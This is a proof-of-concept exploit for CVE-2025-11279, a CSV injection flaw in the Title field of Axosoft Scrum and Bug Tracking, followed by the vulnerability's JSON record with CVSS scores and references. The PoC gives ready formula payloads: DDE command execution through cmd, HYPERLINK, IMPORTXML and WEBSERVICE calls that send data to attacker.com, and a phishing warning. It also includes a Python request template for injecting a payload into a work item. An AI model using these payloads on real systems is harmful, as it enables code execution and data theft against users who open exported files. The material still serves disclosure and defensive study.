CVE-2025-11279

# CVE-2025-11279 - Axosoft Scrum and Bug Tracking CSV Injection PoC # The vulnerability exists in the "Title" field of "Add Work Item Page" # Injecting CSV formula characters at the beginning of the Title parameter # Malicious payloads that can be injected into the Title field: # Payload 1: DDE-based command execution (Windows) payload_1 = '=cmd|\'/c calc\'!A1' # Payload 2: Data exfiltration via HYPERLINK payload_2 = '=HYPERLINK("http://attacker.com/exfil?data="&A1,"Click for details")' # Payload 3: Information disclosure via IMPORTXML payload_3 = '=IMPORTXML("http://attacker.com/malicious.xml","//data")' # Payload 4: Phishing via warning message payload_4 = '=10*10+WARNING("Your session has expired, please re-login")' # Payload 5: Direct external reference payload_5 = '=WEBSERVICE("http://attacker.com/payload")' # Example HTTP request to exploit the vulnerability: import requests target_url = "https://target-axosoft-server/ItemAdd.asp" # (Actual endpoint may vary based on Axosoft version and configuration) headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": "ASP.NET_SessionId=<valid_session_cookie>" } data = { "Title": payload_1, # Inject malicious CSV formula as the Title "Description": "Normal description", "Priority": "1", # Other required fields... } # response = requests.post(target_url, headers=headers, data=data) # After the work item is created, export the data as CSV # When victim opens the CSV in Excel, the formula executes automatically

{"cve": {"id": "CVE-2025-11279", "sourceIdentifier": "[email protected]", "published": "2025-10-05T03:15:40.263", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Axosoft Scrum and Bug Tracking 22.1.1.11545. This issue affects some unknown processing of the component Add Work Item Page. The manipulation of the argument Title results in csv injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://drive.google.com/file/d/1Lw9_KYblnhg7FQU70G0SgH_VyYRUD-rX/view?usp=sharing", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327013", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327013", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.659422", "source": "[email protected]"}]}}